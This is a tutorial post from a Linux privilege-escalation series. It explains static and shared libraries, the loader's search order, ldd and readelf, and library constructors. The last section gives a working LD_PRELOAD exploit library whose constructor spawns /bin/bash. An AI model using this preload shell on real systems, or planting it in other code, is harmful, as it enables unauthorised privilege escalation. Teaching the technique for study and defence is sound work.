Understanding Concept of Shared Libraries

Get in-depth knowledge of shared libraries in Linux and how they are used, through a practical approach. Build your first library and use it in your code. Along the way you will also see how dangerous the LD_PRELOAD environment variable is.

So far in the Linux Privilege Escalation series, you have learnt the basic concepts and how to exploit binaries that are ubiquitous on Linux machines. From here on things get a little dirty, as the concepts become tougher for a novice. If something is unclear or looks vague, contact me and I will clear it up.

Most programs you see on Linux are written in C or C++, and so are the interpreters and runtimes behind high-level languages like Java and Python. To keep their code simple and modular, developers write their own libraries or use external libraries written by other developers, reusing that work in the application to save time.

Shared vs Static Libraries

There are two types of libraries

  • Static Libraries (aka archive)
  • Shared Libraries

As the name suggests, static libraries are incorporated into the executable at build time, which makes the executable bulky. Since they ship inside the executable, load time is pretty fast. But if a bug is reported in the library code, distributing the patch is difficult: the developers have to rebuild every application that uses the library and distribute a new version of each. The extension of static libraries is .a

Shared libraries are installed on the system independently, or provided by the developers as separate files, and are not embedded in the executable. Load time is somewhat slower than with a static library, but they are far more modular and easier to distribute: the original developer of the library fixes the code once and tells users how to apply the patch. The extension of shared libraries is .so

In this post, I will focus on the concepts of shared libraries. If you want to learn more about how they work and how you should be using them, I will start another series and write posts on Linux/Windows System Programming. The concept is the same on both operating systems; only the file type and environment change.

ELF File Format and Library Search Order

When you create an executable that uses a shared library, a specific section named .dynamic is added to the ELF file, and it contains information about the libraries to load. To get the list of dependent libraries you can use either the ldd or the readelf utility. To know more about the ELF format, read the Wikipedia page https://en.wikipedia.org/wiki/Executable_and_Linkable_Format. If you are as lazy as me, the following pic from the same wiki will be pretty helpful

But before going further, you must know how an executable finds a library before loading it.

On the left side, there is the library search order. The first entry has the highest priority and the last one the lowest. This means that if your library is found in a directory listed in the LD_LIBRARY_PATH environment variable, the loader stops searching right there and loads it.
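The first-match-wins behaviour can be modelled in a few lines of C. This is only a simplified sketch and not the loader's real implementation: the helper name find_first and the colon-separated directory list are my own assumptions for illustration, and the real loader also consults /etc/ld.so.cache and paths embedded in the binary.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Simplified model of a first-match search (hypothetical helper, not the
 * real loader code). dirs is a colon-separated list such as "/a:/b".
 * Returns 0 and writes the full path to out on the first hit, -1 otherwise. */
int find_first(const char *dirs, const char *name, char *out, size_t outlen) {
    const char *start = dirs;
    while (*start != '\0') {
        size_t len = strcspn(start, ":");   /* length of this directory */
        if (len > 0) {
            int n = snprintf(out, outlen, "%.*s/%s", (int)len, start, name);
            /* Stop at the first directory that really contains the file. */
            if (n > 0 && (size_t)n < outlen && access(out, F_OK) == 0)
                return 0;
        }
        start += len;
        if (*start == ':')
            start++;                        /* skip the separator */
    }
    if (outlen > 0)
        out[0] = '\0';                      /* nothing found */
    return -1;
}
```

With a list like "/tmp/evil:/usr/lib", a libgreet.so sitting in /tmp/evil would win over the one in /usr/lib, which is exactly why an attacker-controlled entry early in the search order is a problem.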

Now, how does a program know whether it has to load a given library? Well, that's what the .dynamic section does. It holds the exact name of each library to be loaded, and when a file in a search directory matches that name, the loader immediately loads it.

Also, if the library is not found even in /lib and /usr/lib, the loader will throw an error similar to "error while loading shared libraries: <name>: cannot open shared object file: No such file or directory"

$ ls -l app 
-rwxr-xr-x 1 root root 16200 Aug  9 00:34 app
$ ldd app 
        linux-vdso.so.1 (0x00007ffde1bef000)
        libc.so.6 => /usr/lib/libc.so.6 (0x00007fa203d80000)
        /lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa203f7e000)
$ readelf -d app 

Dynamic section at offset 0x2df8 contains 26 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
 0x000000000000000c (INIT)               0x1000
 0x000000000000000d (FINI)               0x12b8
 ---------------- trimmed ------------------

The command readelf -d app lists the contents of the .dynamic section, whereas ldd app specifically lists the shared libraries required by the executable, along with the location where each file was found by following the search order.
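The NEEDED rows can also be counted from inside a running process. Here is a minimal sketch, assuming glibc on Linux and a dynamically linked program; count_needed is a name I made up for illustration, while _DYNAMIC is the symbol the linker provides for the start of the program's own .dynamic section.

```c
#include <elf.h>
#include <link.h>

/* Start of this program's own .dynamic section. The linker defines the
 * symbol for dynamically linked programs (glibc's <link.h> declares it too). */
extern ElfW(Dyn) _DYNAMIC[];

/* Count the DT_NEEDED entries, i.e. the "(NEEDED)" rows of readelf -d. */
int count_needed(void) {
    int count = 0;
    /* The section is an array of tag/value pairs terminated by DT_NULL. */
    for (const ElfW(Dyn) *d = _DYNAMIC; d->d_tag != DT_NULL; d++) {
        if (d->d_tag == DT_NEEDED)
            count++;
    }
    return count;
}
```

Compiled into app, this should report the same number of NEEDED entries that readelf -d app prints for it.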

The library linux-vdso.so.1 can be ignored from an infosec point of view, as the kernel automatically maps it into every user-space application. The vdso(7) man page covers it in more detail.

To see how the loading works, run the program with the runtime environment variable LD_DEBUG=libs

$ LD_DEBUG=libs ./app 2>&1  | tr -s " "
 154979:        find library=libc.so.6 [0]; searching
 154979:         search cache=/etc/ld.so.cache
 154979:         trying file=/usr/lib/libc.so.6
 154979:
 154979:
 154979:        calling init: /lib64/ld-linux-x86-64.so.2
 154979:
 154979:
 154979:        calling init: /usr/lib/libc.so.6
 154979:
 154979:
 154979:        initialize program: ./app
 154979:
 154979:
 154979:        transferring control: ./app
 154979:
o
 154979:
 154979:        calling fini: ./app [0]
 154979:
++++o++++
+++ooo+++
++ooooo++
+ooooooo+
ooooooooo

Now on the right side, you will see something called a "symbol". A symbol is any variable or function name defined in the library that our executable uses. And that makes sense: until the library is loaded into memory, a program can't use the code it defines.

Creating and Using Shared Libraries

Before creating a library, let's get to know the following two components

  • The library itself
  • The header file

You already know that the library contains the definitions of the symbols used by the executable. But during development, how does the developer know the name of a symbol, or whether it is a function or a variable? For that, the signatures of the symbols are declared in header files; this is also known as prototyping or declaration.

So let's start by creating a simple library that contains a function greet() with a char [] parameter and a void return type. In the following code, I have created a header file with the specification of the function.

#ifndef GREET_H
#define GREET_H

extern void greet(char name[]);

#endif
greet.h

extern is a keyword in the C programming language that declares a variable or function defined elsewhere, without assigning any memory to it. It is used to declare variables and functions in header files; for function declarations it is optional, since they are extern by default.
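The difference between declaring and defining is easier to see with a variable. The sketch below uses names I invented for illustration (greet_count and count_greeting are not part of the library built in this post) and keeps both halves in one file for brevity, whereas normally the first half would live in a header and the second in a .c file.

```c
/* Declarations: what a header such as greet.h would carry. No storage is
 * reserved here; they only promise that the symbols exist somewhere. */
extern int greet_count;
extern void count_greeting(void);

/* Definitions: what the library's .c file would carry. This is where the
 * memory for greet_count is actually allocated. */
int greet_count = 0;

void count_greeting(void) {
    greet_count++;
}
```

Any other file that sees the declarations can call count_greeting() and read greet_count, while the storage for greet_count exists only once, where it is defined.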

Now it's time to define the implementation of the greet function. That would be done in the following file

#include <stdio.h>

void greet(char name[]) {
	printf("Hello, %s!\n", name);
}
greet.c

Once you have enough code to build your library, it's time to call GCC and build the .so file. For simplicity, I will create the library in the /usr/lib directory. You can instead use a low-privileged user and the LD_LIBRARY_PATH environment variable, which will give you exposure to the library search order.

gcc -shared -fPIC -o /usr/lib/libgreet.so greet.c

In the above command, -shared tells GCC to create a shared library out of the supplied code. If it is omitted, GCC will look for the main function and try to build an ELF executable. The -fPIC flag generates position-independent code, which lets the library be loaded at any address in memory.

Please note the name of the library: it starts with lib. All libraries should start with lib, and when naming one in the GCC build command you pass -l<name without lib and extension>, so libgreet.so becomes -lgreet.
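The naming rule is mechanical enough to write down as code. This is just an illustrative sketch with a hypothetical helper name (lib_file_name); the real linker does more, for example it can also fall back to a static lib<name>.a archive.

```c
#include <stdio.h>

/* Hypothetical helper: build the shared-library file name that -l<name>
 * refers to, e.g. "greet" -> "libgreet.so".
 * Returns 0 on success, -1 if the result does not fit into out. */
int lib_file_name(const char *name, char *out, size_t outlen) {
    int n = snprintf(out, outlen, "lib%s.so", name);
    return (n > 0 && (size_t)n < outlen) ? 0 : -1;
}
```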

Let's see this in action after writing code for the executable binary below

#include <stdio.h>
#include "greet.h"

int main() {
        char name[20];
        scanf("%19s", name); /* leave room for the terminating NUL */
        greet(name);
        return 0;
}
main.c

It's now time to build the application for our use.

If you build main.c on its own, the linking phase fails with an undefined reference to greet, because the linker has not been told which library defines it. To fix this, pass the library to the linker with -lgreet. Since the library is shared, its name will be added to the .dynamic section of the executable.

$ gcc main.c -o app -lgreet

Now if you run the ldd command on the binary, it will show all the libraries, including our custom libgreet

$ ldd ./app 
        linux-vdso.so.1 (0x00007ffc6f90d000)
        libgreet.so => /usr/lib/libgreet.so (0x00007f31b7ca1000)
        libc.so.6 => /usr/lib/libc.so.6 (0x00007f31b7ad5000)
        /lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007f31b7cd8000)

Also, readelf will show the name of the library as a NEEDED entry

$ readelf -d app  | grep -E "(NEEDED|OPTIONAL)"
 0x0000000000000001 (NEEDED)             Shared library: [libgreet.so]
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]

Using LD_PRELOAD to Execute Malicious Code

Just as an executable program has the main function, libraries have entry and exit functions that are executed when the library is loaded and unloaded.

  • _init
  • _fini
  • __attribute__((constructor))
  • __attribute__((destructor))

The first two are obsolete and dangerous, but still supported for backwards compatibility. I would rather encourage you to use the last two, and most of the time the one you will need is __attribute__((constructor))

The attribute is placed just before or after the function's name in its prototype, and the function is then defined as usual.

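#include <stdio.h>

/* Runs when the library is loaded */
void enter(void) __attribute__((constructor));
/* Runs when the library is unloaded; not named exit, to avoid clashing with exit() from libc */
void leave(void) __attribute__((destructor));

void enter(void) {
	printf("library loaded\n");
}

void leave(void) {
	printf("library unloaded\n");
}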

Now after recompiling the library code and executing the same binary you will see when and how the library constructor and destructor are called

$ sudo gcc -shared -fPIC -o /usr/lib/libgreet.so greet.c
$ ./app 
library loaded
tbhaxor
Hello, tbhaxor!
library unloaded
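The same ordering can be checked without a separate library, because GCC and Clang also honour the attribute inside an ordinary program. A minimal sketch, with names (load_events, on_load, constructor_ran) that I made up for illustration:

```c
static int load_events = 0;   /* bumped once by the constructor */

/* Runs automatically before main() in a program, or at load time when
 * the code is built into a shared library. */
__attribute__((constructor))
static void on_load(void) {
    load_events++;
}

/* Lets a caller confirm that the constructor has already run. */
int constructor_ran(void) {
    return load_events == 1;
}
```

Calling constructor_ran() as the very first statement of main() already returns 1, which shows that the constructor ran before any of your own code did. A destructor mirrors this at the other end of the process lifetime.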

What bad actors do is load their own library through the LD_PRELOAD environment variable, and for that the library does not have to follow the naming convention. Let's see this in action as well.

The exploit code is as follows

#include <stdlib.h>

void shell()__attribute__((constructor));

void shell() {
        unsetenv("LD_PRELOAD");
        system("/bin/bash");
}

In this code, everything looks familiar except unsetenv("LD_PRELOAD"). If you omit this line, the child process started by the system() call inherits LD_PRELOAD and loads exploit.so again, which spawns yet another shell, and so on recursively until your memory is filled.
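The inheritance itself is easy to observe safely. The sketch below uses a harmless stand-in variable instead of LD_PRELOAD, so nothing is actually preloaded; the helper name child_sees and the variable DEMO_PRELOAD are assumptions for illustration only.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>

/* Returns 1 if a child shell started with system() sees a non-empty
 * environment variable called name, 0 otherwise. */
int child_sees(const char *name) {
    char cmd[128];
    int n = snprintf(cmd, sizeof cmd, "test -n \"${%s}\"", name);
    if (n < 0 || (size_t)n >= sizeof cmd)
        return 0;
    int status = system(cmd);   /* the child inherits our environment */
    return status != -1 && WIFEXITED(status) && WEXITSTATUS(status) == 0;
}
```

After setenv("DEMO_PRELOAD", "/tmp/demo.so", 1) the helper returns 1, and after unsetenv("DEMO_PRELOAD") it returns 0. That is the same effect the exploit relies on: once the variable is removed, the shell spawned by system() no longer pulls the library in again.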

A bit of trivia: I tried this on my PC, and within a few seconds it filled all my RAM and swap by endlessly spawning /bin/bash processes. For more information, read this question: https://security.stackexchange.com/questions/205562/why-in-ld-preload-exploit-we-call-unsetenvld-preload